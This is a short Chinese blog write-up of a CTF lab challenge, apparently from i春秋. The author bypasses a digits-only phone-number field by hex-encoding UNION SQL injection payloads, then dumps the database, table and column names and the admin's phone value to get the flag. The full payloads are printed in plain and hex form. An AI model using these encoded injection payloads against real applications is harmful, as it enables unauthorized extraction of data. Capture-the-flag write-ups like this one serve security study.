i春秋-Phone number(union注入+hex转码)

时间：2020-05-12 19:42:00 阅读：78 评论：0 收藏：0 [点我收藏+]

记一道union注入语句转十六进制的注入题。
这个网站的基本功能就是可以找出跟你用户名相同的注册的人数。
注册登录给了两个显位。
技术分享图片
点击check可以显示出有多少人和你用户名相同。

同时在这个页面的源代码里面有提示

电话号码都是数字，在输入字母的时候显示要输入数字，其实很明显这道题是一道注入题。我们可以将注入语句转成数字，16进制数字也是从数字嘛。

1 and 1=2 union select database()
hex=0x3120616E6420313D3220756E696F6E2073656C6563742064617461626173652829

暴库
技术分享图片

1 and 1=2 union select table_name from information_schema.tables where table_schema=database()
hex=0x3120616E6420313D3220756E696F6E2073656C656374207461626C655F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D64617461626173652829

暴表
技术分享图片

1 and 1=2 union select column_name from information_schema.columns where table_name="user"
hex=0x3120616E6420313D3220756E696F6E2073656C65637420636F6C756D6E5F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D227573657222

暴列
在这里爆出了一堆的字段。
技术分享图片
结合前面提示的admin，有用的应该是username吧。自己拿着username查了半天，一直查不出了flag。看了别人的WP才知道要结合phone字段。

1 and 1=2 union select phone from user where username="admin"
hex=0x3120616E6420313D3220756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2261646D696E22

技术分享图片

i春秋-Phone number(union注入+hex转码)

原文：https://www.cnblogs.com/HelloCTF/p/12877737.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)